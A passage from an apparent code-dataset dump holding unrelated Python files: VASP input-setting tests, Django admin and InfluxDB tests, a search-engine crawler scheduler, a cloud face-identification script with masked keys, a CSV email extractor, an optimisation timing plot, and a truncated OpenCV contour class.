'ENCUT': 400.0}\n self.assertEqual(expected, setting.settings)\n\n def test_phonon_force(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.phonon_force\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'ADDGRID': True,\n 'IBRION': 2,\n 'PREC': 'A',\n 'ISIF': 2,\n 'ISMEAR': 0,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-08,\n 'KPAR': 4,\n 'ENCUT': 400.0}\n self.assertEqual(expected, setting.settings)\n\n def test_defect(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.defect\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 2,\n 'ISMEAR': 0,\n 'ISPIN': 2,\n 'LREAL': \"A\",\n 'EDIFF': 1e-05,\n 'NSW': 50,\n 'EDIFFG': -0.03,\n 'KPAR': 4,\n 'ENCUT': 400.0}\n self.assertEqual(expected, setting.settings)\n\n def test_band(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.band\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 0,\n 'ISMEAR': 0,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-05,\n 'KPAR': 4,\n 'NBANDS': 12,\n 'ENCUT': 400.0}\n self.assertEqual(expected, setting.settings)\n\n def test_dos(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.dos\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 0,\n 'ISMEAR': -5,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-05,\n 'KPAR': 4,\n 'NBANDS': 12,\n 'ENCUT': 400.0,\n 'EMIN': -12.01,\n 'EMAX': 23,\n 'NEDOS': 3502}\n self.assertEqual(expected, setting.settings)\n\n def test_dielectric_dfpt(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.dielectric_dfpt\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 8,\n 'PREC': 'N',\n 'ISIF': 0,\n 'ISMEAR': 0,\n 'ISPIN': 1,\n 'LREAL': False,\n 'LEPSILON': True,\n 'EDIFF': 1e-06,\n 'KPAR': 4,\n 'ENCUT': 400.0}\n self.assertEqual(expected, setting.settings)\n\n def test_dielectric_finite_field(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.dielectric_finite_field\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 6,\n 'PREC': 'N',\n 'ISIF': 0,\n 'ISMEAR': 0,\n 'ISPIN': 1,\n 'LCALCEPS': True,\n 'POTIM': 0.015,\n 'LREAL': False,\n 'EDIFF': 1e-06,\n 'KPAR': 4,\n 'ENCUT': 400.0}\n self.assertEqual(expected, setting.settings)\n\n def test_dielectric_function(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.dielectric_function\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = 
{'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 0,\n 'ISMEAR': -5,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-05,\n 'KPAR': 4,\n 'NBANDS': 12,\n 'CSHIFT': 0.01,\n 'LOPTICS': True,\n 'ENCUT': 400.0,\n 'EMIN': -12.01,\n 'EMAX': 23,\n 'NEDOS': 3502}\n self.assertEqual(expected, setting.settings)\n\n def test_args(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.dos\n kwargs[\"num_kpoints\"] = 1\n kwargs[\"is_magnetization\"] = True\n kwargs[\"vbm_cbm\"] = None\n kwargs[\"encut\"] = 800.0\n\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 0,\n 'ISMEAR': 0,\n 'ISPIN': 2,\n 'LREAL': False,\n 'EDIFF': 1e-05,\n 'KPAR': 1,\n 'NBANDS': 12,\n 'ENCUT': 800.0,\n 'EMIN': -20.01,\n 'EMAX': 20,\n 'NEDOS': 4002}\n self.assertEqual(expected, setting.settings)\n\n def test_args_2(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.dos\n kwargs[\"num_kpoints\"] = 18\n kwargs[\"num_nodes\"] = 2\n kwargs[\"structure_opt_encut_factor\"] = 1.5\n\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 0,\n 'ISMEAR': -5,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-05,\n 'KPAR': 6,\n 'NBANDS': 12,\n 'ENCUT': 400.0,\n 'EMIN': -12.01,\n 'EMAX': 23,\n 'NEDOS': 3502}\n self.assertEqual(expected, setting.settings)\n\n\nclass XcIncarSettingsTest(ViseTest):\n def setUp(self) -> None:\n self.default_kwargs = {\"xc\": Xc.pbe,\n \"symbol_list\": [\"Mg\", \"O\"],\n \"factor\": 1}\n\n def test(self):\n setting = XcIncarSettings.from_options(**self.default_kwargs)\n expected = {'LWAVE': False, 'ALGO': 'N'}\n self.assertEqual(expected, setting.settings)\n\n def test_hubbard_u(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"symbol_list\"] = [\"Zn\", \"O\"]\n setting = XcIncarSettings.from_options(**kwargs)\n expected = {'ALGO': 'N',\n 'LWAVE': False,\n 'LDAUU': [5, 0],\n 'LDAU': True,\n 'LDAUTYPE': 2,\n 'LDAUPRINT': 1,\n 'LDAUL': [2, -1],\n 'LMAXMIX': 4}\n self.assertEqual(expected, setting.settings)\n\n def test_hybrid(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"xc\"] = Xc.hse\n kwargs[\"factor\"] = 2\n setting = XcIncarSettings.from_options(**kwargs)\n expected = {'ALGO': 'D',\n 'LWAVE': True,\n 'NKRED': 2,\n 'HFSCREEN': 0.208,\n 'TIME': 0.4,\n 'LHFCALC': True,\n 'PRECFOCK': 'Fast',\n 'AEXX': 0.25}\n self.assertEqual(expected, setting.settings)\n\n\nclass CommonIncarSettingsTest(ViseTest):\n def setUp(self) -> None:\n self.default_kwargs = {\"potcar\": Potcar([\"Mg\", \"O\"]),\n \"composition\": Composition({\"Mg\": 1, \"O\": 2}),\n \"charge\": 1}\n\n def test(self):\n setting = CommonIncarSettings.from_options(**self.default_kwargs)\n print(setting.settings)\n expected = {'NELM': 100,\n 'LASPH': True,\n 'LORBIT': 12,\n 'LCHARG': False,\n 'SIGMA': 0.1,\n 'NELECT': 13}\n self.assertEqual(expected, setting.settings)\n","sub_path":"vise/input_set/tests/test_settings_incar.py","file_name":"test_settings_incar.py","file_ext":"py","file_size_in_byte":11623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"326265151","text":"from django.contrib import admin\nfrom .models import AgentTransport\n\n\nclass AgentTransportAdmin(admin.ModelAdmin):\n list_display = ('date', 'status', 'principal', 'shipper', 'agent', 'size', 'booking_no', 'pickup_tr', 'pickup_from', 'yard_ndd', 'return_tr', 'return_to', \\\n 'container_1','container_2', 'remark', 'work_type', 'operation_type', 'price', 'work_id', 'work_number', 
'pickup_date', 'return_date', 'detail', 'summary_status')\n\n ordering = ('date', 'principal__name', 'shipper__name', 'work_type', 'booking_no', 'work_id')\n\n search_fields = ['work_id', 'booking_no', 'container_1', 'container_2']\n \nadmin.site.register(AgentTransport, AgentTransportAdmin)","sub_path":"ndd-app/agent_transport/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"645195365","text":"from unittest import mock\n\nfrom django.conf import settings\n\nimport analytics\nfrom analytics.influxdb_wrapper import InfluxDBWrapper\nfrom analytics.influxdb_wrapper import get_events_for_organisation\n\n\ndef test_write(monkeypatch):\n # Given\n mock_influxdb_client = mock.MagicMock()\n monkeypatch.setattr(analytics.influxdb_wrapper, \"influxdb_client\", mock_influxdb_client)\n\n mock_write_api = mock.MagicMock()\n mock_influxdb_client.write_api.return_value = mock_write_api\n\n influxdb = InfluxDBWrapper(\"name\", \"field_name\", \"field_value\")\n\n # When\n influxdb.write()\n\n # Then\n mock_write_api.write.assert_called()\n\n\ndef test_influx_db_query_when_get_events_then_query_api_called(monkeypatch):\n # Given\n org_id = 123\n influx_org = settings.INFLUXDB_ORG\n read_bucket = settings.INFLUXDB_BUCKET + \"_downsampled_15m\"\n query = ' from(bucket:\"%s\") \\\n |> range(start: -30d, stop: now()) \\\n |> filter(fn:(r) => r._measurement == \"api_call\") \\\n |> filter(fn: (r) => r[\"_field\"] == \"request_count\") \\\n |> filter(fn: (r) => r[\"organisation_id\"] == \"%s\") \\\n |> drop(columns: [\"organisation\", \"resource\", \"project\", \"project_id\"]) \\\n |> sum()' % (read_bucket, org_id)\n\n mock_influxdb_client = mock.MagicMock()\n monkeypatch.setattr(analytics.influxdb_wrapper, \"influxdb_client\", mock_influxdb_client)\n\n mock_query_api = mock.MagicMock()\n mock_influxdb_client.query_api.return_value = mock_query_api\n\n # When\n get_events_for_organisation(org_id)\n\n # Then\n mock_query_api.query.assert_called_once_with(org=influx_org, query=query)\n","sub_path":"src/analytics/tests/test_influxdb_wrapper.py","file_name":"test_influxdb_wrapper.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"210423635","text":"# -*- coding:utf-8 -*-\n# filename:crawlerTask\n# 16/2/6 下午11:59\nimport datetime\nimport os\nimport sys\nimport threading\n\nfrom config.basicConfig import PROJECT_PATH\nfrom database.BaseMySQL import MySQL\nfrom model.BaseModel import Alumni\nimport spider.pageForBaidu\nimport spider.pageForSo360\nimport spider.pageForSogou\nimport logging\nimport logging.handlers\nfrom utils.basicTool import Num\n\n__author__ = 'bingone'\nlogger = logging.getLogger('crawlerTask')\n# fh = logging.handlers.TimedRotatingFileHandler(PROJECT_PATH + '/log/crawlerTask.log', when='D',encoding='utf8')\n# fh.setLevel(logging.INFO)\n# fh.setFormatter(logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n# datefmt='%a, %d %b %Y %H:%M:%S'))\n# logger.addHandler(fh)\nglobal crawlerNum\ncrawlerNum = Num()\nmysql = MySQL.Instance()\n\ndef crawlerTask():\n pass\n reload(sys)\n sys.setdefaultencoding('utf-8')\n # baidu sogou 360\n mysqlSession = mysql.session\n query = mysqlSession.query(Alumni)\n lst = query.all()\n mysqlSession.close()\n logger.warn(\"crawlerTask start\")\n global crawlerNum\n crawlerNum.clear()\n t1 = 
threading.Thread(target=spider.pageForBaidu.Baidu.crawlerBaidu(lst), name='crawlerBaidu')\n t2 = threading.Thread(target=spider.pageForSogou.Sogou.crawlerSogou(lst), name='crawlerSogou')\n t3 = threading.Thread(target=spider.pageForSo360.So360.crawlerSo360(lst), name='crawlerSo360')\n t1.start()\n t2.start()\n t3.start()\n t1.join()\n t2.join()\n t3.join()\n logger.warn(\"crawlerPage:\" + str(crawlerNum.num) + \" crawlerTask end\")\n # for t in query.all():\n # words=[t.industry,t.name]\n # baidu = Baidu(word=words, sch_id=t.graduate, alumni_id=t.alumni_id)\n # baidu.parseHtml()\n # sogou = Sogou(word=words, sch_id=t.graduate, alumni_id=t.alumni_id)\n # sogou.parseHtml()\n # sogou = So360(word=words, sch_id=t.graduate, alumni_id=t.alumni_id)\n # sogou.parseHtml()\n\n\ndef startCrawlerTask():\n from apscheduler.schedulers.blocking import BlockingScheduler\n scheduler = BlockingScheduler()\n scheduler.add_job(crawlerTask, 'cron', second='0',minute='15', hour='8')\n print('Press Ctrl+{0} to exit'.format('Break' if os.name == 'nt' else 'C'))\n try:\n scheduler.start()\n except (KeyboardInterrupt, SystemExit):\n scheduler.shutdown()\n\n\nif __name__ == '__main__':\n crawlerTask()\n # print datetime.datetime.now()\n# startCrawlerTask()\n","sub_path":"bingone_crawler/spider/crawlerTask.py","file_name":"crawlerTask.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"100670870","text":"from itertools import product\n\nimport pandas as pd\n\nfrom source_code.core.hypothesis_evaluation.test_handler import run_tests_for\nfrom source_code.utils.tools import experiment_name\n\n\ndef run_experiments(pivots, segmentations, df, test_type=\"mean\", test_arg=\"Two-Samples\", error_correction_test=\"FDR\",\n threshold=0.05,\n plot=False, output_prefix=\"\"):\n names = []\n print(\"EXPT\")\n for (pivot_type, pivot_arg), (segmentation_type, segmentation_arg) in product(pivots, segmentations):\n if pivot_type is None:\n test_arg = 'One-Sample'\n\n name = experiment_name(pivot_type, pivot_arg, segmentation_type, segmentation_arg)\n result = run_tests_for(df, pivot_type, pivot_arg, segmentation_type, segmentation_arg, test_type, test_arg,\n error_correction_test, threshold, plot)\n if not len(result):\n print(\"No result found \", name)\n continue\n names.append(f\"experiments/results/{output_prefix}\" + name + \".csv\")\n pd.DataFrame(result).to_csv(names[-1])\n print(\"DDDone\", name)\n return names\n","sub_path":"source_code/notebooks/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"67438314","text":"# coding: utf-8\nimport pytest\n\nfrom procset import ProcSet\n\nfrom codecs import open\nfrom copy import deepcopy\nfrom tempfile import mkstemp\nfrom oar.lib.job_handling import JobPseudo\nfrom oar.kao.slot import Slot, SlotSet\nfrom oar.kao.scheduling import (schedule_id_jobs_ct,\n set_slots_with_prev_scheduled_jobs)\nimport oar.kao.quotas as qts\nimport oar.lib.resource as rs\n\nfrom oar.lib import config, get_logger\n\n# import pdb\n\nconfig['LOG_FILE'] = ':stderr:'\nlogger = get_logger(\"oar.test\")\n\n\"\"\"\n quotas[queue, project, job_type, user] = [int, int, float];\n | | |\n maximum used resources ----------+ | |\n maximum number of running jobs -------+ |\n maximum resources times (hours) ------------+\n\"\"\"\n\n\ndef compare_slots_val_ref(slots, v):\n sid = 1\n i = 0\n while 
True:\n slot = slots[sid]\n (b, e, itvs) = v[i]\n if ((slot.b != b) or (slot.e != e)\n or not slot.itvs == itvs):\n return False\n sid = slot.next\n if (sid == 0):\n break\n i += 1\n return True\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef oar_conf(request):\n config['QUOTAS'] = 'yes'\n\n def remove_quotas():\n config['QUOTAS'] = 'no'\n\n request.addfinalizer(remove_quotas)\n\n\n@pytest.fixture(scope='function', autouse=True)\ndef reset_quotas():\n qts.quotas_rules = {}\n qts.quotas_job_types = ['*']\n\n\ndef test_quotas_one_job_no_rules():\n config['QUOTAS'] = 'yes'\n\n v = [(0, 59, ProcSet(*[(17, 32)])), (60, 100, ProcSet(*[(1, 32)]))]\n\n res = ProcSet(*[(1, 32)])\n ss = SlotSet(Slot(1, 0, 0, res, 0, 100))\n all_ss = {\"default\": ss}\n hy = {'node': [ProcSet(*x) for x in [[(1, 8)], [(9, 16)], [(17, 24)], [(25, 32)]]]}\n\n j1 = JobPseudo(id=1, types={}, deps=[], key_cache={},\n queue='default', user='toto', project='',\n mld_res_rqts=[\n (1, 60,\n [([(\"node\", 2)], res)]\n )\n ], ts=False, ph=0)\n\n schedule_id_jobs_ct(all_ss, {1: j1}, hy, [1], 20)\n\n assert compare_slots_val_ref(ss.slots, v)\n\n\ndef test_quotas_one_job_rule_nb_res_1():\n config['QUOTAS'] = 'yes'\n # quotas.set_quotas_rules({('*', '*', '*', '/'): [1, -1, -1]})\n # global quotas_rules\n qts.quotas_rules = {('*', '*', '*', '/'): [1, -1, -1]}\n\n res = ProcSet(*[(1, 32)])\n rs.default_resource_itvs = ProcSet(*res)\n\n ss = SlotSet(Slot(1, 0, 0, ProcSet(*res), 0, 100))\n all_ss = {\"default\": ss}\n hy = {'node': [ProcSet(*x) for x in [[(1, 8)], [(9, 16)], [(17, 24)], [(25, 32)]]]}\n\n j1 = JobPseudo(id=1, queue='default', user='toto', project='')\n j1.simple_req(('node', 2), 60, res)\n\n schedule_id_jobs_ct(all_ss, {1: j1}, hy, [1], 20)\n\n print(j1.start_time)\n assert j1.res_set == ProcSet()\n\n\ndef test_quotas_one_job_rule_nb_res_2():\n\n config['QUOTAS'] = 'yes'\n # quotas.set_quotas_rules({('*', '*', '*', '/'): [1, -1, -1]})\n # global quotas_rules\n qts.quotas_rules = {('*', '*', '*', '/'): [16, -1, -1]}\n\n res = ProcSet(*[(1, 32)])\n rs.default_resource_itvs = res\n\n ss = SlotSet(Slot(1, 0, 0, res, 0, 100))\n all_ss = {\"default\": ss}\n hy = {'node': [ProcSet(*x) for x in [[(1, 8)], [(9, 16)], [(17, 24)], [(25, 32)]]]}\n\n j1 = JobPseudo(id=2, types={}, deps=[], key_cache={},\n queue='default', user='toto', project='',\n mld_res_rqts=[\n (1, 60,\n [([(\"node\", 2)], res)]\n )\n ], ts=False, ph=0)\n\n schedule_id_jobs_ct(all_ss, {1: j1}, hy, [1], 20)\n\n assert j1.res_set == ProcSet(*[(1, 16)])\n\n\ndef test_quotas_four_jobs_rule_1():\n\n config['QUOTAS'] = 'yes'\n # quotas.set_quotas_rules({('*', '*', '*', '/'): [1, -1, -1]})\n # global quotas_rules\n qts.quotas_rules = {('*', '*', '*', '/'): [16, -1, -1],\n ('*', 'yop', '*', '*'): [-1, 1, -1]}\n\n res = ProcSet(*[(1, 32)])\n rs.default_resource_itvs = ProcSet(*res)\n\n ss = SlotSet(Slot(1, 0, 0, ProcSet(*res), 0, 10000))\n all_ss = {\"default\": ss}\n hy = {'node': [ProcSet(*x) for x in [[(1, 8)], [(9, 16)], [(17, 24)], [(25, 32)]]]}\n\n j1 = JobPseudo(id=1, start_time=0, walltime=20,\n queue='default', user='toto', project='',\n res_set=ProcSet(*[(9, 24)]), types={}, ts=False, ph=0)\n j2 = JobPseudo(id=2, start_time=0, walltime=50,\n queue='default', user='lulu', project='yop',\n res_set=ProcSet(*[(1, 8)]))\n\n j3 = JobPseudo(id=3, queue='default', user='toto', project='')\n j3.simple_req(('node', 1), 10, res)\n\n j4 = JobPseudo(id=4, queue='default', user='lulu', project='yop')\n j4.simple_req(('node', 1), 60, res)\n\n 
set_slots_with_prev_scheduled_jobs(all_ss, [j1, j2], 5)\n\n ss.show_slots()\n # pdb.set_trace()\n schedule_id_jobs_ct(all_ss, {3: j3, 4: j4}, hy, [3, 4], 5)\n\n print(j3.start_time, j4.start_time)\n\n assert j3.start_time == 20\n assert j3.res_set == ProcSet(*[(9, 16)])\n assert j4.start_time == 50\n assert j4.res_set == ProcSet(*[(1, 8)])\n\n\ndef test_quotas_three_jobs_rule_1():\n\n config['QUOTAS'] = 'yes'\n # quotas.set_quotas_rules({('*', '*', '*', '/'): [1, -1, -1]})\n # global quotas_rules\n qts.quotas_rules = {('*', '*', '*', '/'): [16, -1, -1],\n ('default', '*', '*', '*'): [-1, -1, 2000]}\n\n res = ProcSet(*[(1, 32)])\n rs.default_resource_itvs = ProcSet(*res)\n\n ss = SlotSet(Slot(1, 0, 0, ProcSet(*res), 0, 10000))\n all_ss = {\"default\": ss}\n hy = {'node': [ProcSet(*x) for x in [[(1, 8)], [(9, 16)], [(17, 24)], [(25, 32)]]]}\n\n j1 = JobPseudo(id=1, start_time=50, walltime=100,\n queue='default', user='toto', project='',\n res_set=ProcSet(*[(17, 24)]), types={}, ts=False, ph=0)\n\n j2 = JobPseudo(id=2, queue='default', user='toto', project='')\n j2.simple_req(('node', 1), 200, res)\n\n j3 = JobPseudo(id=3, queue='default', user='lulu', project='yop')\n j3.simple_req(('node', 1), 100, res)\n\n set_slots_with_prev_scheduled_jobs(all_ss, [j1], 5)\n\n ss.show_slots()\n # pdb.set_trace()\n schedule_id_jobs_ct(all_ss, {2: j2, 3: j3}, hy, [2, 3], 5)\n\n print(j2.start_time, j3.start_time)\n\n assert j2.start_time == 150\n assert j2.res_set == ProcSet(*[(1, 8)])\n assert j3.start_time == 0\n assert j3.res_set == ProcSet(*[(1, 8)])\n\n\ndef test_quotas_two_job_rules_nb_res_quotas_file():\n\n config['QUOTAS'] = 'yes'\n _, quotas_file_name = mkstemp()\n config['QUOTAS_FILE'] = quotas_file_name\n\n # quotas_file = open(quotas_file_name, 'w')\n with open(config['QUOTAS_FILE'], 'w', encoding=\"utf-8\") as quotas_fd:\n quotas_fd.write('{\"quotas\": {\"*,*,*,toto\": [1,-1,-1],\"*,*,*,john\": [150,-1,-1]}}')\n\n qts.load_quotas_rules()\n\n res = ProcSet(*[(1, 32)])\n rs.default_resource_itvs = res\n\n ss = SlotSet(Slot(1, 0, 0, res, 0, 100))\n all_ss = {\"default\": ss}\n hy = {'node': [ProcSet(*x) for x in [[(1, 8)], [(9, 16)], [(17, 24)], [(25, 32)]]]}\n\n j1 = JobPseudo(id=1, types={}, deps=[], key_cache={},\n queue='default', user='toto', project='',\n mld_res_rqts=[\n (1, 60,\n [([(\"node\", 2)], res)]\n )\n ], ts=False, ph=0)\n\n j2 = JobPseudo(id=2, types={}, deps=[], key_cache={},\n queue='default', user='tutu', project='',\n mld_res_rqts=[\n (1, 60,\n [([(\"node\", 2)], res)]\n )\n ], ts=False, ph=0)\n\n schedule_id_jobs_ct(all_ss, {1: j1, 2: j2}, hy, [1, 2], 20)\n\n assert j1.res_set == ProcSet()\n assert j2.res_set == ProcSet(*[(1, 16)])\n\n\ndef test_quotas_two_jobs_job_type_proc():\n config['QUOTAS'] = 'yes'\n _, quotas_file_name = mkstemp()\n config['QUOTAS_FILE'] = quotas_file_name\n\n # quotas_file = open(quotas_file_name, 'w')\n with open(config['QUOTAS_FILE'], 'w', encoding=\"utf-8\") as quotas_fd:\n quotas_fd.write('{\"quotas\": {\"*,*,yop,*\": [-1,1,-1]}, \"quotas_job_types\": [\"yop\"]}')\n\n qts.load_quotas_rules()\n\n print(qts.quotas_rules, qts.quotas_job_types)\n\n res = ProcSet(*[(1, 32)])\n rs.default_resource_itvs = res\n\n ss = SlotSet(Slot(1, 0, 0, res, 0, 100))\n all_ss = {\"default\": ss}\n hy = {'node': [ProcSet(*x) for x in [[(1, 8)], [(9, 16)], [(17, 24)], [(25, 32)]]]}\n \n j1 = JobPseudo(id=1, queue='default', user='toto', project='', types={'yop'})\n j1.simple_req(('node', 1), 50, res)\n j2 = JobPseudo(id=2, queue='default', user='toto', project='', 
types={'yop'})\n    j2.simple_req(('node', 1), 50, res)\n\n    schedule_id_jobs_ct(all_ss, {1: j1, 2: j2}, hy, [1, 2], 20)\n\n    print(j1.start_time, j2.start_time)\n\n    assert j1.start_time == 0\n    assert j2.start_time == 50\n","sub_path":"tests/kao/test_quotas.py","file_name":"test_quotas.py","file_ext":"py","file_size_in_byte":8781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
{"seq_id":"11860695","text":"from django import template\nfrom decimal import *\n\nregister = template.Library()\n\n# Operations\n# + Decimal\n@register.filter\ndef add_decimal(value, arg):\n    result = None\n    if arg is None:\n        result = value\n    elif value is None:\n        result = arg\n    else:\n        result = Decimal(Decimal(value) + Decimal(arg))\n    return float(result)\n@register.filter\ndef subtract_decimal(value, arg):\n    result = None\n    if arg is None:\n        result = value\n    elif value is None:\n        result = arg\n    else:\n        result = Decimal(Decimal(value) - Decimal(arg))\n    return float(result)\n# + Dictionary\n@register.filter\ndef dict_total(value, arg):\n    total = 0\n    for item in value:\n        total = total + item[arg]\n    return total\n# + List\n@register.filter\ndef list_total(value, arg):\n    total = 0\n    for item in value:\n        total = total + getattr(item, arg)\n    return total\n# + Manager\n@register.filter\ndef manager_total(value, arg):\n    total = 0\n    for item in value:\n        total = total + getattr(item, arg)\n    return total\n\n# Specific Actions\n@register.filter\ndef margin_total(value):\n    total = 0\n    for item in value:\n        margin = item.get_margin()\n        if margin:\n            total = total + margin\n    return float(total)\n","sub_path":"app/templatetags/launchpad_tags.py","file_name":"launchpad_tags.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"140492415","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\n\nfrom qcloud_image import Client\nfrom qcloud_image import CIUrl, CIFile, CIBuffer, CIUrls, CIFiles, CIBuffers\n\nappid = '#########'\nsecret_id = '##############'\nsecret_key = '#####################'\nbucket = 'faceslib'\n\nclient = Client(appid, secret_id, secret_key, bucket)\nclient.use_http()\nclient.set_timeout(30)\n\nresult = client.face_identify('group1', CIFile('./10xxl2.jpeg'))\nvalue_no=80\nvalue_yes=96\nperson=client.face_getinfo(result['data']['candidates'][0]['person_id'])\nperson_name = person['data']['person_name']\nconfidence=result['data']['candidates'][0]['confidence']\nprint(confidence)\nif confidence>=value_yes:\n    print('The customer is:')\n    print(person_name)\n\n# print(client.face_getinfo('person_5'))\n\n# print (client.face_newperson('person_10', ['group1',], CIFile('./10xxl1.jpeg')))\n# print (client.face_setinfo('person_10', 'Xiongxinli'))\n# print (client.face_getpersonids('group1'))\n","sub_path":"shibie.py","file_name":"shibie.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"421416851","text":"#emails.csv\nimport csv\nfaculty_file = csv.DictReader(open('/Users/natalieabril/ds/metis/prework/dsp/python/faculty.csv'), skipinitialspace = 'True')\n\noutfile = open('emails.csv', 'wb')\nwriter = csv.writer(outfile, delimiter = '\\n')\n\nemails=[]\n\nfor row in faculty_file:\n    
emails.append(row['email'])\n\nwriter.writerow(emails)\n","sub_path":"python/advanced_python_csv.py","file_name":"advanced_python_csv.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"367169364","text":"from gradient_descent_back_tracking import *\nfrom newton_descent_back_tracking import *\nimport matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n f = lambda x: x[0]**4 + x[1]**2\n x0 = [1, 1]\n\n epsilons = np.linspace(1e-3, 1e-4, 20)\n GD_times = []\n N_times = []\n i = 1\n for e in epsilons:\n print(i)\n _, time_GD = gradient_descent(x0, f, e, line_search=GD_backtrack, max_iters=1000, print_steps=False)\n _, time_N = newton_gradient_descent(x0, f, e, line_search=newton_backtrack, max_iters=1000)\n GD_times.append(time_GD)\n N_times.append(time_N)\n i += 1\n\n # print(GD_times)\n # print(N_times)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(GD_times)\n ax.plot(N_times)\n plt.show()","sub_path":"convex_functions_algorithms/ploting_between_descents.py","file_name":"ploting_between_descents.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"140801323","text":"import cv2\n#import matplotlib.pyplot as plt\n#import matplotlib.image as mpimg\nimport numpy as np\nimport time\n#from Quality_Measure import *\n\nclass ContourOperations:\n\tdef __init__(self):\n\t\tself.image=[]\n\t\tself.box=[]\n\t\tself.contourlist=[]\n\t\tself.contoursorted=[]\n\t\tself.contour_to_show=[]\n\t\tself.area=0.0\n\t\tself.contour_no=0\n\t\tself.dimX=0\n\t\tself.dimY=0\n\t\tself.object_threshold=100000000000\n\t\tself.image_threshold=0\n\t\tself.show_scale_factor=1.0\n\t\tself.OrientationStatus=\"UNKNOWN\"\n\t\tself.SizeStatus=\"UNKNOWN\"\n\t\tself.imageCounter=0\n\t\tself.deltaTime=0.0\n\t\tself.leadZeros=5\n\t\tself.controlImagePath=\"control_images/\"\n\t\t\n\tdef set_lastScanTime(self,time) :\n\t\tself.lastScanTime=time\n\t\t\n\tdef set_contour_no(self, contour_no):\n\t\tself.contour_no=contour_no\n\t\n\tdef list_contours(self, frame):\n\t\tblur = cv2.GaussianBlur(frame,(5,5),0)\n\t\tself.dimX , self.dimY = frame.shape[:2]\n\t\tif self.dimX>0:\n\t\t\t(cnts, _) = cv2.findContours(blur, cv2.RETR_EXTERNAL, 2)\n\t\t\t#(cnts, _) = cv2.findContours(self.image, cv2.RETR_TREE, 1)\n\t\t\t#CHAIN_APPROX_SIMPLE CV_CHAIN_APPROX_TC89_L1,CV_CHAIN_APPROX_TC89_KCOS\n\t\t\t#cv::CHAIN_APPROX_NONE = 1, cv::CHAIN_APPROX_SIMPLE = 2, cv::CHAIN_APPROX_TC89_L1 = 3, cv::CHAIN_APPROX_TC89_KCOS = 4\n\t\t\t\n\t\t\tcnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:10]\n\t\t\tself.contoursorted=cnts\n\t\t\n\tdef get_selected_contour(self, frame, contour_no):\n\t\tself.list_contours(frame)\n\t\tif len(self.contoursorted)>1:\n\t\t\tself.contour_to_show=self.contoursorted[contour_no]\n\t\t\t#del contour_to_show[0]\n\t\t\t#print(\"showcontour\")\n\t\t\treturn self.contour_to_show\n\t\telse: \n\t\t\tprint(\"no contour!\")\n\t\t\treturn None \n\t\n\tdef get_selected_area(self):\n\t\tself.area=cv2.contourArea(self.contour_to_show)\n\t\treturn self.area\n\t\n\tdef set_object_threshold(self, threshold):\n\t\tself.object_threshold=threshold\n\t\n\tdef set_image_threshold(self, threshold):\n\t\tself.image_threshold=threshold\n\t\n\tdef split_colors(self,frame):\n\t\tself.dimX , self.dimY = frame.shape[:2]\n\t\tif self.dimX>0:\n\t\t\tself.blueImage,self.greenImage,self.redImage 